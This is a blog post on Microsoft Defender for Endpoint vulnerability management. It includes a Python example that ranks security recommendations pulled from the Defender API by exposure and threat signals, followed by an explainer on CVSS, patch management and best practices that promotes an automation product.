Let's take a closer look at one of the recommendations, "Update Microsoft Windows 10 (OS and built-in applications)". Clicking the recommendation opens its details, including:
- a description of the security recommendation
- the number of exposed devices and a list of all affected endpoints
- the impact on the exposure score and on the Secure Score for Devices
- the list of vulnerabilities associated with the recommendation, with a breakdown of the CVEs by severity (critical, high, medium, low), a description of each CVE, related threats and the exposed OS
In the security recommendations menu, you also can:
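The same prioritization can be reproduced outside the portal, for instance to feed a ticketing system. The following is an added example, not code from the original page or from Microsoft: the records are constructed in the shape of what the Defender for Endpoint API returns from GET https://api.securitycenter.microsoft.com/api/recommendations (the value array's exposureImpact, configScoreImpact, exposedMachinesCount, publicExploit, activeAlert, associatedThreats and status fields); the ids and names in the sample are made up, and the weighting is this example's own heuristic for the threat and breach-likelihood factors, not Microsoft's scoring. Business value is not part of the API record, so it is supplied as an optional per-recommendation weight.

```python
"""Rank Defender vulnerability-management security recommendations.

Added example, not code from the original page or from Microsoft. Records follow
the layout of the Defender for Endpoint API response for
GET https://api.securitycenter.microsoft.com/api/recommendations; the weighting
is this example's own heuristic, not Microsoft's scoring.
"""
from dataclasses import dataclass
import json
import urllib.request

API_URL = "https://api.securitycenter.microsoft.com/api/recommendations"

# Threat-factor weights (heuristic values chosen for this example).
WEIGHT_ACTIVE_ALERT = 3.0     # Defender already raised an alert on this in the tenant
WEIGHT_PUBLIC_EXPLOIT = 2.0   # public exploit code exists
WEIGHT_THREAT_CAMPAIGN = 1.5  # linked to a threat campaign tracked by Microsoft

# Constructed sample in the shape of the API's "value" array (ids/names made up, not tenant data).
SAMPLE_RECOMMENDATIONS = [
    {"id": "va-_-microsoft-_-windows_10", "recommendationName": "Update Windows 10 (OS and built-in applications)",
     "remediationType": "Update", "exposureImpact": 5.53, "configScoreImpact": 0,
     "exposedMachinesCount": 11, "publicExploit": True, "activeAlert": False,
     "associatedThreats": ["threat-0001"], "status": "Active"},
    {"id": "va-_-adobe-_-acrobat_reader_dc", "recommendationName": "Update Adobe Acrobat Reader DC",
     "remediationType": "Update", "exposureImpact": 1.2, "configScoreImpact": 0,
     "exposedMachinesCount": 12, "publicExploit": True, "activeAlert": True,
     "associatedThreats": [], "status": "Active"},
    {"id": "va-_-google-_-chrome", "recommendationName": "Update Google Chrome",
     "remediationType": "Update", "exposureImpact": 2.1, "configScoreImpact": 0,
     "exposedMachinesCount": 40, "publicExploit": False, "activeAlert": False,
     "associatedThreats": [], "status": "Active"},
    {"id": "sca-_-tamper_protection", "recommendationName": "Turn on Tamper Protection",
     "remediationType": "ConfigurationChange", "exposureImpact": 0, "configScoreImpact": 0.8,
     "exposedMachinesCount": 60, "publicExploit": False, "activeAlert": False,
     "associatedThreats": [], "status": "Active"},
    {"id": "va-_-oracle-_-java", "recommendationName": "Update Oracle Java",
     "remediationType": "Update", "exposureImpact": 3.0, "configScoreImpact": 0,
     "exposedMachinesCount": 9, "publicExploit": True, "activeAlert": False,
     "associatedThreats": [], "status": "Exception"},  # accepted risk: excluded from the ranking
]


@dataclass(frozen=True)
class Ranked:
    recommendation_id: str
    name: str
    risk: float
    reasons: tuple


def threat_reasons(rec: dict) -> tuple:
    """Human-readable threat signals present on the record."""
    reasons = []
    if rec.get("activeAlert"):
        reasons.append("active alert")
    if rec.get("publicExploit"):
        reasons.append("public exploit")
    if rec.get("associatedThreats"):
        reasons.append("threat campaign")
    return tuple(reasons)


def threat_multiplier(rec: dict) -> float:
    """Threat factor: observed or likely exploitation raises the urgency."""
    m = 1.0
    if rec.get("activeAlert"):
        m *= WEIGHT_ACTIVE_ALERT
    if rec.get("publicExploit"):
        m *= WEIGHT_PUBLIC_EXPLOIT
    if rec.get("associatedThreats"):
        m *= WEIGHT_THREAT_CAMPAIGN
    return m


def risk_score(rec: dict, business_weight: float = 1.0) -> float:
    """Breadth of exposure x threat x business value.

    exposureImpact is how much the exposure score drops once the recommendation
    is remediated; multiplied by exposedMachinesCount it approximates how wide
    the problem is. Configuration recommendations report exposureImpact 0, so
    configScoreImpact is used for them instead of silently dropping them.
    """
    impact = rec.get("exposureImpact") or rec.get("configScoreImpact") or 0.0
    exposed = rec.get("exposedMachinesCount", 0)
    return round(impact * exposed * threat_multiplier(rec) * business_weight, 2)


def rank(recommendations, business_weights=None) -> list:
    """Return Active recommendations ordered by descending risk score."""
    business_weights = business_weights or {}
    ranked = [
        Ranked(r["id"], r["recommendationName"],
               risk_score(r, business_weights.get(r["id"], 1.0)), threat_reasons(r))
        for r in recommendations
        if r.get("status", "Active") == "Active"  # skip Exception (accepted-risk) items
    ]
    return sorted(ranked, key=lambda x: x.risk, reverse=True)


def fetch_recommendations(bearer_token: str) -> list:
    """Pull live records; needs an Azure AD app with the Vulnerability.Read.All permission."""
    records, url = [], API_URL
    while url:  # follow OData paging if the tenant has many recommendations
        req = urllib.request.Request(url, headers={"Authorization": f"Bearer {bearer_token}"})
        with urllib.request.urlopen(req) as resp:  # network call; the sample run below never makes it
            page = json.load(resp)
        records.extend(page.get("value", []))
        url = page.get("@odata.nextLink")
    return records


if __name__ == "__main__":
    for item in rank(SAMPLE_RECOMMENDATIONS):
        print(f"{item.risk:8.2f}  {item.name}  [{', '.join(item.reasons) or 'no threat signals'}]")
```

Run as-is it ranks the constructed sample; replace SAMPLE_RECOMMENDATIONS with fetch_recommendations(token) to rank a real tenant. Note that the Acrobat Reader item, with far fewer exposed devices than Chrome, still ends up ahead of it because the active alert and public exploit multiply its score, which is the effect the three-factor prioritization in the portal is meant to have; items in Exception status are dropped because an accepted risk should not keep reappearing at the top of the queue.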

Vulnerability Management explained


What is vulnerability management?

Vulnerability management is the practice of proactively identifying, assessing and remediating vulnerabilities in IT systems, and it is a crucial element of any cybersecurity strategy. Left unaddressed, the vulnerabilities in ordinary computer systems become a significant risk to the security of the whole environment. If vulnerability management had a slogan, it would be: "better safe than sorry".

Common Vulnerability Scoring System (CVSS)

The nonprofit FIRST (Forum of Incident Response and Security Teams) maintains the Common Vulnerability Scoring System, a framework that standardizes how the severity of a vulnerability is expressed. Drawing on input from CISOs and experts across the security industry, FIRST has released the third major version of the model, CVSS v3 (revision 3.1), which puts more emphasis on timing and environment: a vulnerability is scored with a base metric group, a temporal metric group and an environmental metric group. FIRST also publishes an online calculator for working out your own scores; you can find it here. Scores range from 0.0 to 10.0. To give some numbers: based on CVSS, the average vulnerability published in 2021 scored 7.1 out of 10.0. Google and Microsoft had the most vulnerabilities, 1123 and 1108 respectively, and together these two vendors account for more than 10% of all vulnerabilities published in 2021. Think about your own company: you are almost certainly running products from at least one of them.

The way to mitigate these vulnerabilities is vulnerability management: taking charge and ownership of them. The first step is detecting the vulnerabilities. Microsoft Defender for Endpoint is one of the products that can help build a healthy security environment: its sensors discover vulnerabilities and misconfigurations in real time, and it forms the first barrier against ransomware, malware and attackers.

Patch management is a second barrier

A patch management policy should be the second barrier.
As many as 60% of data breaches have been linked to vulnerable software, that is, software that was not patched. Weekly maintenance costs rose by 34%, surpassing those of the previous year, and rectifying vulnerabilities has taken up more and more time in recent years. You can find more about patch management policy here.

What are the vulnerability management best practices?

Every company needs a vulnerability management process to manage the risks created by unaddressed flaws in its IT systems. Here is a checklist to help you make sure you have covered the basics and are protecting your IT infrastructure in a responsible way.

1. Inventory your IT environment
The inventory should include operating systems and their versions, plus the native and third-party applications used in your organisation. With a clear overview of your IT environment you can make sure you are patching everything that needs patching. Microsoft TVM is a good solution for a full overview of your IT estate; to know more about Microsoft TVM, read this blog.

2. Prioritize vulnerabilities
Classifying vulnerabilities by impact and severity is one of the basic steps towards remediating risk; categorizing them helps you understand and assess the issues. In Microsoft TVM you can see the severity of each vulnerability under Vulnerability management -> Weaknesses. Read more here.

3. Apply patches as soon as possible, but don't forget about testing
It is essential to install updates as soon as they are available, but a bad patch can break other parts of your environment. To avoid this, test patches before you deploy them to the entire estate.

4. Scan and audit your IT environment for vulnerabilities regularly
The longer a security hole stays open, the more likely it is that you will be attacked. Patch management should be a continuous process with regular, ongoing scanning.

5. Automate the patch management process
With the right software to manage your patches, like Scappman, you can significantly reduce the amount of work you have to do. Automation is far more effective than doing it manually, so it is worth the investment. And remember: it's better to be safe than sorry.